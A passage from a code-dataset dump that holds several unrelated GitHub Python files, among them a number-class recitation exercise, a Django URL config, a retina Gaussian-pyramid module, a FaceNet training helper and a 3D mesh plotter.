other._imag\n return Complex(real,imag)\nclass Real(Complex):\n\n ''' Returns True if other is a Real object that has the same value or if other is\n a Complex object with _imag=0 and same value for _real, False otherwise\n >>> Real(4) == Real(4)\n True\n >>> Real(4) == Real(4.0)\n True\n >>> Real(5) == Complex(5, 0)\n True\n >>> Real(5) == Complex(5, 12)\n False\n >>> Real(5) == 5.5\n False\n '''\n def __init__(self, value):\n super().__init__(value, 0)\n\n def __mul__(self,other):\n if(isinstance(other,Real)):\n return Real(self._real*other._real)\n elif(isinstance(other,int)):\n return Real(other*self._real)\n elif(isinstance(other,float)):\n return Real(other*self._real)\n elif(isinstance(other,Complex)):\n real = self._real * other._real - self._imag * other._imag\n imag = self._real*other._imag + other._real * self._imag\n return Complex(real,imag)\n def __rmul__(self,other):\n if(isinstance(other,Real)):\n return Real(self._real*other._real)\n 
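# Scalar ints and floats keep the result in the Real subtype; only a\n # genuine Complex operand (final branch) widens the result back to Complex.\n 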
elif(isinstance(other,int)):\n return Real(other*self._real)\n elif(isinstance(other,float)):\n return Real(other*self._real)\n elif(isinstance(other,Complex)):\n real = self._real * other._real - self._imag * other._imag\n imag = self._real*other._imag + other._real * self._imag\n return Complex(real,imag)\n \n def __eq__(self, other):\n\n ''' Returns True if other is a Real object that has the same value or if other is\n a Complex object with _imag=0 and same value for _real, False otherwise\n\n >>> Real(4) == Real(4)\n True\n >>> Real(4) == Real(4.0)\n True\n >>> Real(5) == Complex(5, 0)\n True\n >>> Real(5) == Complex(5, 12)\n False\n >>> Real(5) == 5.5\n False\n '''\n # YOUR CODE STARTS HERE\n isEq = False\n if isinstance(self,Real) and isinstance(other,Real):\n if(self._real == other._real):\n isEq = True\n elif isinstance(self,Real) and isinstance(other,Complex):\n if(self._real == other._real and other._imag == 0):\n isEq = True\n return isEq\n def __int__(self):\n return int(self._real)\n def __float__(self):\n return float(self._real)\nif __name__ == \"__main__\":\n import doctest\n doctest.run_docstring_examples(Real, globals(), name='Rec4',verbose=True) # Uncomment this line if you want to run doctest by function. Replace get_words with the name of the function you want to run\n #doctest.testmod() # Uncomment this line if you want to run the docstring in all functions\n\n","repo_name":"adesai1033/CMPSC132","sub_path":"RECITATION/Rec4.py","file_name":"Rec4.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28507980224","text":"# EU\n'''sexo = 'M' or 'F'\nwhile sexo == 'M' and 'F':\n sexo += str(input('Informe o sexo do bebê [M/F] ')).upper()\n print('')\n if sexo != 'M' or 'F':\n print('Valor informado inválido! \\n Digite novamente')\nprint('Acabou')'''\n\n# GUANABARA\nsexo = str(input('Por favor. Informe seu sexo: [M/F]')).strip().upper()[0]\nwhile sexo not in 'MmFf':\n sexo = str(input('Valor inválido! Digite novamente: '))\nprint('Sexo {} registrado com sucesso.'.format(sexo))\n","repo_name":"TurSilv4/exercicioscursoemvideo","sub_path":"ex057.py","file_name":"ex057.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1894344003","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = \"users\"\nurlpatterns = [ \n path(\"kyc_count/\", view=views.KycCount.as_view(), name=\"kyc_count\"),\n path(\"kyc_list/\", view=views.KycList.as_view(), name=\"kyc_list\"),\n path(\"kyc_status/\", view=views.UserKycStatus.as_view(), name=\"kyc_status\"),\n path(\"notification_list/\", view=views.NotificationList.as_view(), name=\"notification_list\"),\n path(\"signup_terms_list/\", view=views.Signup_terms_list.as_view(), name=\"signup_terms_list\"), \n path(\"user_list/\", view=views.UserList.as_view(), name=\"user_list\"),\n path(\"/notification/\", view=views.UserNotification.as_view(), name=\"notification\"),\n path(\"/password/\", view=views.ChangePassword.as_view(), name=\"password\"),\n path(\"/kyc/\", view=views.UserKyc.as_view(), name=\"kyc\"), \n path(\"/mobile_number/\", view=views.MobileVerification.as_view(), name=\"mobile_number\"),\n path(\"/profile/\", view=views.UserProfile.as_view(), name=\"profile\"),\n path(\"/invitee/\", view=views.UserInviteeList.as_view(), name=\"invitee\"),\n path(\"/invitation/\", view=views.UserInvitation.as_view(), name=\"invitation\"),\n path(\"/referral_bonus/\", view=views.UserReferralBonus.as_view(), name=\"referral_bonus\"),\n path(\"/usertype/\", view=views.UserType.as_view(), name=\"usertype\"),\n path(\"/tempstring/\", view=views.TempString.as_view(), name=\"tempstring\"),\n]","repo_name":"doramong0926/coinfactory_ico","sub_path":"bluecots_ico/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71206409319","text":"def solution(n):\n direction = [(0,1),(1,0),(0,-1),(-1,0)]\n def blue_checker(i,j):\n queue = [(i,j)]\n while queue:\n i,j = queue.pop(0)\n for d in range(4):\n x = i+direction[d][0]\n y = j+direction[d][1]\n if 0<=x tfvar {source}\n \n # locate values from {terraform/*.tfvars, data sources}\n values = {}\n values[path.basename(backend_config)] = parse_tfvars(backend_config)\n values[path.basename(ami_config)] = parse_tfvars(ami_config)\n values[path.basename(bastion_config)] = parse_tfvars(bastion_config)\n values[path.basename(allowed_networks)] = parse_tfvars(allowed_networks)\n for name, source in vars.items():\n if source.startswith('dynamodb['): # DynamoDB item scan: `dynamodb[][]`\n var_opts.append('-var')\n var_opts.append(f'{name}={dynamodb.get_items(source, workspace, DEFAULT_REGION)}')\n elif source in values: # Individual bindings\n var_opts.append('-var')\n if isinstance(values[source][name], list):\n var_opts.append(f'{name}={json.dumps(values[source][name])}')\n else:\n var_opts.append(f'{name}={values[source][name]}')\n else: # Other global variables should be single value for file bindings\n var_opts.append('-var-file')\n var_opts.append(path.join(varfile_dir, source))\n return var_opts\n","repo_name":"cicdenv/cicdenv","sub_path":"lib/cicdctl/utils/terraform/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"38652731398","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 16:20:09 2018\n\nRetina Pyramids\n@author: Piotr Ozimek\n\"\"\"\nfrom os.path import join\nfrom retinavision.retina import Retina\nfrom retinavision import datadir, utils\nimport cv2\nimport numpy as np\n\n\"\"\"\n03.02.2019 refactor plan\n- Pyramid class:\n - validation function\n - separate DoG class that 
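Annotation: the cicdctl component.py record above maps each variable binding either to an inline `-var name=value` pair (JSON-encoding list values) or to a `-var-file` path. The same dispatch can be exercised without Terraform or DynamoDB; the dicts below are made-up stand-ins for the parsed tfvars files:

import json

def build_var_opts(bindings, values, varfile_dir='terraform'):
    """Turn {var_name: source_file} bindings into a terraform CLI argument list."""
    opts = []
    for name, source in bindings.items():
        if source in values:                      # individual binding: inline -var
            val = values[source][name]
            rendered = json.dumps(val) if isinstance(val, list) else val
            opts += ['-var', f'{name}={rendered}']
        else:                                     # fall back to a whole var-file
            opts += ['-var-file', f'{varfile_dir}/{source}']
    return opts

values = {'backend.tfvars': {'region': 'us-east-1', 'zones': ['a', 'b']}}
print(build_var_opts({'region': 'backend.tfvars',
                      'zones': 'backend.tfvars',
                      'extra': 'extra.tfvars'}, values))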
simplifies creating DoGs\nExtensions:\n - extrema detection \n - ->corners\n\n- robustness to different pyramidss\n- so, uh, was/is objectify() needed?\n- parameter investigations \n sumitha's: lambda 1:L0, 1.7...:L123 (?)\n 'cortical color constancy model' params (lambda = 4)\n- validate on GPU\n\"\"\"\n\nclass Pyramid: \n #TODO: convert Coefficients into numpy object arrays! (?)\n def __init__(self, tess=0, coeffs=0, N=0, R=0):\n self.tessellations = tess\n self.coefficients = coeffs\n self.norm_maps = N\n self.retina = R\n self.PV = 0\n \n #TODO: descriptive vars\n self.levels = len(tess) if type(tess) == list else 0\n self.sigma_factor = 0\n self.rf_fov = 0\n \n \"\"\"Load pickled *array of tessellations* \"\"\"\n def loadTess(self, path):\n self.tessellations = utils.loadPickle(path)\n self.levels = len(self.tessellations)\n \n \"\"\"Load pickled *array of coefficient arrays* \"\"\" \n def loadCoeffs(self, path):\n self.coefficients = utils.loadPickle(path)\n #validate\n \n def loadNormMaps(self, path):\n self.norm_maps = utils.loadPickle(path)\n \n def setRetina(self, R):\n self.retina = R\n R.validate()\n \n def info(self):\n print(\"Tessellations, coefficients and normalization maps are all\\n\\\n stored as arrays of np.arrays. Starting from Level 0 (retina)\\n\\\n for the tessellations and from L01 for the coefficients and \\n\\\n norm_maps variables. This means that the retinal coefficients\\n\\\n and the retina normalization image are only stored inside the\\n\\\n retina variable.\")\n \n \"\"\"Core sampling/pyramidizing function\"\"\"\n def sample(self, V0): \n PV = np.ndarray(self.levels, dtype='object')\n PV[0] = V0\n \n for level in range(1,self.levels):\n C = self.coefficients[level-1]\n #nans signify a node that is outside of the image frame\n nans = np.where(np.isnan(PV[level-1]))\n V = np.zeros(len(C))\n for node in range(len(C)):\n #Omit nans or they'll spill into image centre\n not_nan = np.where(np.logical_not(np.isin(C[node][0],nans)))\n coeff_i = C[node][0][not_nan]\n coeffs = C[node][1][not_nan]\n \n V[node] = np.sum(PV[level-1][coeff_i] * coeffs)\n PV[level] = V\n \n self.PV = PV\n return PV\n \n def backproject_last(self, n=True):\n out = self.backproject(self.PV, self.retina._imsize, self.retina._fixation, n)\n return out \n \n def backproject(self, PV, shape, fixation, n=True):\n R = self.retina #TODO cleanup variable namespace\n BV = []\n BV.append(PV[0])\n for i in [1,2,3]: \n V_stream = [PV[i]]\n for j in range(i,0,-1):\n V = V_stream[i-j]\n C = self.coefficients[j-1]\n V0 = np.zeros(len(PV[j-1]))\n \n for rf in range(len(V)):\n V0[C[rf][0]] += V[rf] * C[rf][1]\n V_stream.append(V0)\n BV.append(V_stream[-1])\n \n #from the top\n BI = []\n for i, v in enumerate(BV[::-1]):\n if i == len(BV[::-1])-1: \n BI.append(R.backproject_tight(v, R._imsize, R._fixation, normalize=n)) ###TODO: correct?\n else:\n BI.append(R.backproject_tight(v, R._imsize, R._fixation, normalize=n, norm=self.norm_maps[i]))\n return BI\n \n def visualize(self, BI, title, dog=False): #redundant since GPU\n print(title + \" (below)\")\n for i in range(len(BI[:-1])): #:-1 skips the retinal level\n if dog: \n utils.picshow(np.true_divide(BI[i], self.norm_maps[i]))\n else: \n utils.picshow(np.uint8(np.true_divide(BI[i], self.norm_maps[i])))\n print(title + \" (above)\")\n\n\n\"\"\"Functions kept for posterity\"\"\"\nclass PyramidBuilder:\n def __init__(self):\n self.a = 0\n \n def generateTessellations50k(self): \n pyr_path=join(datadir,\"pyramid\")\n #Load tessellations levels\n levels = 
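Annotation: Pyramid.sample in the pyramid.py record above pools each coarse node from a sparse list of (index array, weight array) coefficient pairs, masking NaN source nodes so off-image values do not spill into the result. The kernel of that loop, isolated on invented toy data (three source nodes, two target nodes):

import numpy as np

src = np.array([1.0, np.nan, 3.0])                      # level L-1 values; NaN = off-image node
coeffs = [(np.array([0, 1]), np.array([0.5, 0.5])),     # target node 0 pools source nodes 0,1
          (np.array([1, 2]), np.array([0.25, 0.75]))]   # target node 1 pools source nodes 1,2

nan_idx = np.where(np.isnan(src))[0]
out = np.zeros(len(coeffs))
for node, (idx, w) in enumerate(coeffs):
    keep = ~np.isin(idx, nan_idx)                       # drop contributions from NaN sources
    out[node] = np.sum(src[idx[keep]] * w[keep])
print(out)                                              # [0.5  2.25]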
['50k_truetess.pkl', 'tess12k5.pkl', 'tess3125.pkl', 'tess781.pkl']\n \n L0 = utils.loadPickle(join(pyr_path, levels[0]))\n L1 = utils.loadPickle(join(pyr_path, levels[1]))\n L2 = utils.loadPickle(join(pyr_path, levels[2]))\n L3 = utils.loadPickle(join(pyr_path, levels[3]))\n \n #Multiply up coarser tessellations to make them same scale as tess50k\n d5 = 0.0021888014007064422 #fov_dist_5 from the raw 50k node tess\n mean_rf = 1 #target fov_dist_5\n \n L1 *= mean_rf/d5\n L2 *= mean_rf/d5\n L3 *= mean_rf/d5\n L = [L0, L1, L2, L3]\n \n #Sumitha's approach is to use lambda as k_width\n #lambda1 = 1.7321 #sumitha's lambda, w/ retina layer = 1\n #lambda2 = 1.6 * lambda1 #wider rfs\n #lambdaB = 0.5 * lambda1 #possibly 'your' lambda, w/ retinal layer = 0.5\n #rffov = 2.4 #k_ratio\n \n #P = Gpyramid_build(L, lambda1, rffov) #narrow\n #N = Gpyramid_norm(P, R)\n #utils.writePickle(join(pyr_path, \"50K_pyr_narrow_coeffs.pkl\"), P[\"Coefficients\"])\n #utils.writePickle(join(pyr_path, \"50K_pyr_narrow_normmaps.pkl\"), N)\n #utils.writePickle(join(pyr_path,\"50K_pyr_narrow_tessellations.pkl\"), L)\n \n #P2 = Gpyramid_build(L, lambda2, rffov) #wide\n #N2 = Gpyramid_norm(P2, R)\n #utils.writePickle(join(pyr_path, \"50K_pyr_wide_coeffs.pkl\"), P2[\"Coefficients\"])\n ##utils.writePickle(join(pyr_path, \"50K_pyr_wide_normmaps.pkl\"), N2)\n #utils.writePickle(join(pyr_path,\"50K_pyr_wide_tessellations.pkl\"), /\n #P2[\"Tessellations\"])\n \n return L\n\n \"\"\"\n Params:\n L1 - a single, appropriately scaled tessellation (x,y) array. \n L2 - a single, appropriately scaled tessellation that is a pyramid level\n higher than L1\n sigma_factor - (lambda) sigma scaling factor\n rf_fov - the field of view of each receptive field, defined as a factor of\n sigma\n \n Returns:\n Gaussian pyramid coefficients between successive levels L2 and L1.\"\"\"\n def Gpyramid_coeffs(self, L0, L1, sigma_factor, rf_fov):\n L1_coeff = np.ndarray((len(L1)),dtype='object')\n \n #cdist\n DIST10 = utils.cdist_torch(L0, L1).numpy() #distances between two levels\n DIST1 = utils.cdist_torch(L1, L1).numpy() #distances within L1\n \n dist_5 = np.mean(np.sort(DIST1)[:,1:6], axis=1)\n fov = rf_fov * dist_5 #TODO: dist5 * lambda for sumitha, * kratio (2.4) for u\n \n #L1_r = norm(L1, axis=1)\n L1_sigma = sigma_factor*dist_5\n \n for i in range(len(L1)):\n rf = np.where(DIST10[i] <= fov[i])[0]\n \n coeffs = (rf, utils.d_gauss(L1_sigma[i], DIST10[i,rf]))\n L1_coeff[i] = coeffs\n \n return L1_coeff\n\n \"\"\"\n Params:\n L - a list or an array of pyramid tessellations, in order L0...Ln\n sigma_factor - (lambda) Gaussian rf pyramid scaling factor\n rf_fov - the field of view of each receptive field, defined as a factor of\n sigma\n \n Returns:\n Pyramid class, eventually. For now a dict.\n Pyramid - {Tessellations:[L0...Ln], Coefficients:[L1... 
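Annotation: Gpyramid_coeffs above sizes each receptive field from dist_5, the mean distance to a node's five nearest neighbours (columns 1:6 of the row-sorted distance matrix, column 0 being the zero self-distance). The same statistic in plain numpy on a random stand-in tessellation, replacing the record's cdist_torch helper with a broadcasted norm:

import numpy as np

rng = np.random.default_rng(0)
pts = rng.random((50, 2))                                 # stand-in tessellation

diff = pts[:, None, :] - pts[None, :, :]                  # pairwise differences
D = np.linalg.norm(diff, axis=-1)                         # 50x50 distance matrix
dist_5 = np.mean(np.sort(D, axis=1)[:, 1:6], axis=1)      # skip col 0 (self-distance = 0)
print(dist_5.shape, dist_5[:3])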
Ln]}\n L1 Coefficients: [N x tuple([L0 indices], [coeffs]) ]\n where N = len(L1 tessellation)\n \n NOTES:\n Include base retinal parameters?\"\"\"\n def Gpyramid_build(self, L, sigma_factor, rf_fov):\n P = {}\n P['Tessellations'] = L\n P['Coefficients'] = []\n \n for level in range(1,len(L)):\n c = self.Gpyramid_coeffs(L[level-1], L[level], sigma_factor, rf_fov)\n P['Coefficients'].append(c)\n \n return P\n\n \"\"\"Produce normalization maps for each level of the pyramid\"\"\" \n def Gpyramid_norm(self, tess, coeffs, R):\n PV_norm = []\n for i in [1,2,3]:\n #Project unmodulated coefficients down a level (unit imagevector)\n V_stream = [np.ones(len(tess[i]))]\n \n #Down-propagate the projection to the retina\n for j in range(i,0,-1):\n Av = np.zeros(len(tess[j-1]))\n C = coeffs[j-1]\n for rf in range(len(tess[j])):\n Av[C[rf][0]] += C[rf][1] * V_stream[-1][rf]\n V_stream.append(Av)\n \n #Back-project an image\n GI = np.zeros((R.width, R.width))\n r = R.width/2.0\n V = V_stream[-1]\n for i in range(R.N - 1, -1, -1): \n GI = utils.project(V[i] * R.coeff[0,i], GI, R.loc[i,:2][::-1] + r)\n \n norm = np.zeros((R.width, R.width))\n norm = utils.project(GI, norm, (R.width//2, R.width//2))\n PV_norm.insert(0, norm)\n \n return PV_norm\n\n\n##Load retina, take a pic and sample\n#R = Retina(gpu=False)\n#R.loadLoc(join(datadir, \"retinas\", \"ret50k_loc.pkl\"))\n#R.loadCoeff(join(datadir, \"retinas\", \"ret50k_coeff.pkl\"))\n#\n##impath = \"D:\\\\RETINA\\\\images\\\\Harmony_of_Dragons.jpg\"\n##impath = \"D:\\\\RETINA\\\\images\\\\TEST.png\"\n#impath = \"D:\\\\RETINA\\\\images\\\\original.png\"\n#img = np.float64(cv2.imread(impath, 0))\n#x = img.shape[1]/2\n#y = img.shape[0]/2\n#fixation = (y,x)\n#\n#R.prepare(img.shape, fixation)\n#V = R.sample(img, fixation)\n#backproj = np.true_divide(R.backproject_last(n=False),R._gaussNorm)\n#utils.picshow(np.uint8(backproj), size=(10,10))\n#\n###\n##PB = PyramidBuilder()\n##pyr_path = join(datadir,\"pyramid\")\n##L = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_tessellations.pkl\"))\n##lambda1 = 1.7321 #sumitha's lambda, w/ retina layer = 1\n##lambda2 = 1.6 * lambda1 #wider rfs\n##rffov = 2.4 #k_ratio\n##\n##P = PB.Gpyramid_build(L, lambda1, rffov) #narrow\n##N = PB.Gpyramid_norm(P, R)\n##utils.writePickle(join(pyr_path, \"50K_pyr_narrow_coeffs.pkl\"), P[\"Coefficients\"])\n##utils.writePickle(join(pyr_path, \"50K_pyr_narrow_normmaps.pkl\"), N)\n##utils.writePickle(join(pyr_path,\"50K_pyr_narrow_tessellations.pkl\"), L)\n##\n##P2 = PB.Gpyramid_build(L, lambda2, rffov) #wide\n##N2 = PB.Gpyramid_norm(P2, R)\n##utils.writePickle(join(pyr_path, \"50K_pyr_wide_coeffs.pkl\"), P2[\"Coefficients\"])\n###utils.writePickle(join(pyr_path, \"50K_pyr_wide_normmaps.pkl\"), N2)\n##utils.writePickle(join(pyr_path,\"50K_pyr_wide_tessellations.pkl\"), P2[\"Tessellations\"])\n#\n#\n#######\n## \n##pyr_path = join(datadir,\"pyramid\")\n##L = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_tessellations.pkl\"))\n##C = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_coeffs.pkl\"))\n##L2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_tessellations.pkl\"))\n##C2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_coeffs.pkl\"))\n##\n##PB = PyramidBuilder()\n##N = PB.Gpyramid_norm(L, C, R)\n##N2 = PB.Gpyramid_norm(L2, C2, R)\n##\n###\n##\n##utils.writePickle(join(pyr_path, \"50K_pyr_narrow_normmaps.pkl\"), N)\n##utils.writePickle(join(pyr_path, \"50K_pyr_wide_normmaps.pkl\"), N2)\n#\n#######\n##'applied constant blurring in each layer = 1.7321 * initial blurring\n##which gives 
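Annotation: Gpyramid_norm and the back-projection loops accumulate with fancy-indexed `Av[C[rf][0]] += ...`. A pitfall worth knowing: when the index array of a single such assignment contains duplicates, numpy buffers the write and silently drops all but one contribution; np.add.at is the unbuffered form. A contrast on toy data:

import numpy as np

acc = np.zeros(3)
idx = np.array([0, 0, 2])          # index 0 appears twice
acc[idx] += 1.0
print(acc)                          # [1. 0. 1.]  <- duplicate write was lost

acc = np.zeros(3)
np.add.at(acc, idx, 1.0)            # unbuffered scatter-add
print(acc)                          # [2. 0. 1.]

The record's per-rf loop is safe because each rf's index array has unique entries; duplicates only arise across loop iterations, where += accumulates correctly.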
1.7321 * graph edge, or mean_dist_5. That's used to compute diameter\n##of cortical support as well as gaussian sigma. In the retinal layer he maintains\n##the value at 1, whereas your retina seems best with the value at 0.5 \n##(lambda, or sigma_base). If his lambda fails, try 0.5 * 1.7321.\n#\"\"\"\n#A good test for the pyramid is the spatial frequency human vision test. \n#File test2.jpg in images - construct an image like that for your test, sample \n#with pyramid/retina for good evaluations and include in paper.\n#\"\"\"\n#\n##Testing object model\n#\n##Files\n#pyr_path = join(datadir,\"pyramid\")\n#L = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_tessellations.pkl\"))\n#L2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_tessellations.pkl\"))\n#N = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_normmaps.pkl\"))\n#N2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_normmaps.pkl\"))\n#C = utils.loadPickle(join(pyr_path, \"50K_pyr_narrow_coeffs.pkl\"))\n#C2 = utils.loadPickle(join(pyr_path, \"50K_pyr_wide_coeffs.pkl\"))\n#\n##init\n#narrow = Pyramid(tess = L, coeffs = C, N=N, R=R)\n#wide = Pyramid(tess = L2, coeffs = C2, N=N2, R=R)\n#\n##process\n#narrow_PV = narrow.sample(V)\n#wide_PV = wide.sample(V)\n#laplace = wide_PV - narrow_PV\n#\n##backproject\n##narrow_vis = narrow.backproject_last()\n##wide_vis = wide.backproject_last()\n#laplace_vis = narrow.backproject(laplace, R._imsize, fixation, n=False)\n#\n##visualize\n##narrow.visualize(narrow_vis, \"Narrow Gaussian Pyramid\")\n##wide.visualize(wide_vis, \"Wide Gaussian Pyramid\")\n##narrow.visualize(laplace_vis, \"Laplacian Gaussian Pyramid\", log=True)\n##for im in narrow_vis:\n## utils.picshow(im)\n##\n##for im in wide_vis:\n## utils.picshow(im)\n#\n#for im in laplace_vis:\n# utils.picshow(im)\n# \n# \n#narrow.visualize(laplace_vis, \"DoG\", dog=False)\n","repo_name":"Pozimek/RetinaVision","sub_path":"retinavision/pyramid.py","file_name":"pyramid.py","file_ext":"py","file_size_in_byte":13460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12729112623","text":"#!/usr/bin/env python\n# D. 
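Annotation: the commented-out driver at the end of pyramid.py forms a difference-of-Gaussians response as wide_PV - narrow_PV. The idea in one dimension, using scipy on a unit impulse (sigmas here are illustrative, not the record's lambda values; the 1.6x ratio mirrors the wide/narrow pair):

import numpy as np
from scipy.ndimage import gaussian_filter1d

x = np.zeros(101)
x[50] = 1.0                                   # unit impulse
narrow = gaussian_filter1d(x, sigma=2.0)
wide = gaussian_filter1d(x, sigma=3.2)        # 1.6x wider, as in the wide/narrow pyramids
dog = wide - narrow                           # band-pass: negative centre, ~zero net mass
print(round(dog[50], 4), round(dog.sum(), 6))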
Jones - 2/13/14\n\nimport numpy as np\n\ndef rebin(a, new_shape):\n\n M, N = a.shape\n m, n = new_shape\n if m= 0.90)[0][0]\n cutoff_length = sorted_lengths[cutoff_index][0]\n\n truncated_data = {k: v for k, v in length_counts.items() if k <= 800}\n\n fig, ax = plt.subplots(figsize=(12, 6))\n ax.bar(truncated_data.keys(), truncated_data.values())\n ax.set_xlabel('Text Length')\n ax.set_ylabel('Count')\n ax.set_title('Text Length Distribution')\n\n # Add 90% cumulative line\n ax.axvline(cutoff_length, color='r', linestyle='--', label=f'90% cumulative ({cutoff_length})')\n ax.legend()\n\n plt.show()\n\n\ndef main():\n files = [filename for filename in os.listdir('.') if filename.endswith('.jsonl')]\n result = count_text_length(files)\n\n for length, count in sorted(result.items(), key=lambda x: x[0]):\n print(f\"Length: {length}, Count: {count}\")\n\n # Plot histogram\n plot_histogram(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shibing624/text2vec","sub_path":"examples/data/count_text_length.py","file_name":"count_text_length.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":3412,"dataset":"github-code","pt":"19"} +{"seq_id":"24313183473","text":"import Facenet.classifier as classifier\nimport CompVision\nfrom Facenet.Align import align_dataset_mtcnn\nimport os\nfrom DataProcessing import Saver\n\nPATH = os.getcwd()\n\n\ndef train_model(batch_size):\n print('Model Train Started')\n classifier.run('TRAIN', batch_size=batch_size)\n print('Model Training Finished')\n\n\ndef align_faces(image_size=160, margin=32, gpu_memory_fraction=0.1, detect_multi_face=False):\n print('Face Alignment Started')\n align_dataset_mtcnn.run(image_size=image_size, margin=margin, gpu_memory_allocation=gpu_memory_fraction,\n multi_face=detect_multi_face)\n print('Face Alignment Complete')\n print('Blur Started')\n blur_photos()\n print('Blur Completed')\n\n\ndef classify_photo():\n CompVision.take_a_photo()\n name = classifier.run()[0].upper()\n original_path = PATH + '/Predict/CLASS1/Predict.png'\n\n if not name == 'UNKNOWN':\n decision = str(input('Was Prediction Correct? 
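Annotation: count_text_length.py above finds the length below which 90% of texts fall by sorting (length, count) pairs and scanning the cumulative ratio. The same cutoff with a Counter and numpy, on invented data:

import numpy as np
from collections import Counter

counts = Counter({10: 50, 20: 30, 40: 15, 800: 5})        # length -> number of texts
lengths = np.array(sorted(counts))
cum = np.cumsum([counts[l] for l in lengths]) / sum(counts.values())
cutoff = lengths[np.searchsorted(cum, 0.90)]              # first length with cum >= 0.9
print(cutoff)                                             # 40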
[y/n]: ')).upper()\n if decision == 'Y':\n num_photos = Saver.get_num_photos(name)\n os.rename(original_path, PATH + '/People/Raw/{}/{}-{}.png'.format(name, name, num_photos))\n print('file renamed')\n else:\n os.rename(original_path, PATH + '/Predict/CLASS1/UNKNOWN.png')\n else:\n print('file named unknown')\n os.rename(original_path, PATH + '/Predict/CLASS1/UNKNOWN.png')\n\n\ndef classify_many_photos():\n folder = 'People/Random/Class/'\n class_list = classifier.run(_data_dir='People/Random')\n folder_list = os.listdir(folder)\n index = int()\n\n for name in class_list:\n old_pic = PATH + '/' + folder + folder_list[index]\n new_pic = PATH + '/' + folder + name + '-' + str(index)\n os.rename(old_pic, new_pic)\n index = index + 1\n\n folder_list = os.listdir(folder)\n for pic in folder_list:\n name = pic[:-2]\n if not name == 'UNKNOWN':\n num_photos = Saver.get_num_photos(name)\n if num_photos == 0:\n temp_name = name[:-1]\n if Saver.get_num_photos(temp_name) > 0:\n name = temp_name\n else:\n continue\n new_name = '{}-{}.png'.format(name, num_photos)\n old_dir = folder + pic\n new_dir = 'People/Raw/{}/{}'.format(name, new_name)\n os.rename(old_dir, new_dir)\n\n\ndef blur_photos():\n\n directory = PATH + '/People/Aligned/'\n people_names = os.listdir(directory)\n\n for name in people_names:\n person_dir = directory + str(name) + '/'\n\n try:\n for curr_photo in os.listdir(person_dir):\n photo_path = person_dir + curr_photo\n CompVision.blur_photo(photo_path)\n except NotADirectoryError:\n print('{} CAUGHT. NOT A PERSON DIR'.format(person_dir))\n continue\n\n\nif __name__ == '__main__':\n print('This module can only be run from the main.py file')\n input()","repo_name":"anotida01/facenet","sub_path":"Classifier/TRAIN.py","file_name":"TRAIN.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71065896362","text":"import argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\n\ndef plot_off_mesh(filename):\n with open(filename, \"r\") as f:\n lines = f.readlines()\n\n num_vertices, num_faces, _ = map(int, lines[1].split())\n\n vertices = []\n for line in lines[2:2+num_vertices]:\n vertex = list(map(float, line.split()[0:3]))\n vertices.append(vertex)\n\n faces = []\n for line in lines[2+num_vertices:]:\n face = list(map(int, line.split()[1:]))\n faces.append(face)\n\n vertices = np.array(vertices)\n faces = np.array(faces)\n\n # Find the minimum and maximum values in each dimension\n min_coords = np.min(vertices, axis=0)\n max_coords = np.max(vertices, axis=0)\n \n # Translate and scale to fit within the unit cube (0, 1) in all dimensions\n translated_scaled_vertices = (vertices - min_coords) / (max_coords - min_coords)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n\n mesh = Poly3DCollection(translated_scaled_vertices[faces - 1], facecolors=\"cyan\", linewidths=1, edgecolors=\"r\", alpha=0.1)\n ax.add_collection3d(mesh)\n\n ax.set_xlabel(\"X\")\n ax.set_ylabel(\"Y\")\n ax.set_zlabel(\"Z\")\n\n plt.show()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Plot a 3D mesh from a .off file\")\n parser.add_argument(\"filename\", type=str, help=\"Path to the .off file\")\n args = parser.parse_args()\n\n 
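Annotation: the facenet TRAIN.py record above shuffles classified photos into per-person folders with bare os.rename, which raises if the destination directory is missing and can clobber existing files on some platforms. A defensive variant with pathlib, demonstrated inside a temp directory so it runs anywhere (all names and paths here are scratch stand-ins, not the record's layout):

from pathlib import Path
import tempfile

def move_photo(src: Path, person_dir: Path, name: str) -> Path:
    person_dir.mkdir(parents=True, exist_ok=True)        # ensure the target folder exists
    n = len(list(person_dir.glob(f'{name}-*.png')))      # next free index for this person
    dst = person_dir / f'{name}-{n}.png'
    if dst.exists():
        raise FileExistsError(dst)                       # never clobber an existing photo
    return src.rename(dst)

with tempfile.TemporaryDirectory() as tmp:
    src = Path(tmp) / 'Predict.png'
    src.write_bytes(b'fake image')
    print(move_photo(src, Path(tmp) / 'ALICE', 'ALICE'))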
